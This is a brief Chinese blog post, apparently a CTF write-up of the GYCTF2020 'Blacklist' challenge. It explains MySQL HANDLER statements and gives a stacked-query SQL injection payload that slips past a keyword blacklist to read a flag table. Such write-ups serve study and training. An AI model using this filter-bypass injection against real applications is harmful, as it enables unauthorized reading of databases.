[GYCTF2020]Blacklist
时间:2021-08-11 15:32:09
收藏:0
阅读:16
和强网杯的那到sql多了修改表名列名和预编译的过滤。
这题是新的姿势,官方文档。
该HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问。
这个表对象不被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭 。
构造payload
?inject=1‘;HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;
得到flag
原文:https://www.cnblogs.com/akger/p/15127742.html
评论(0)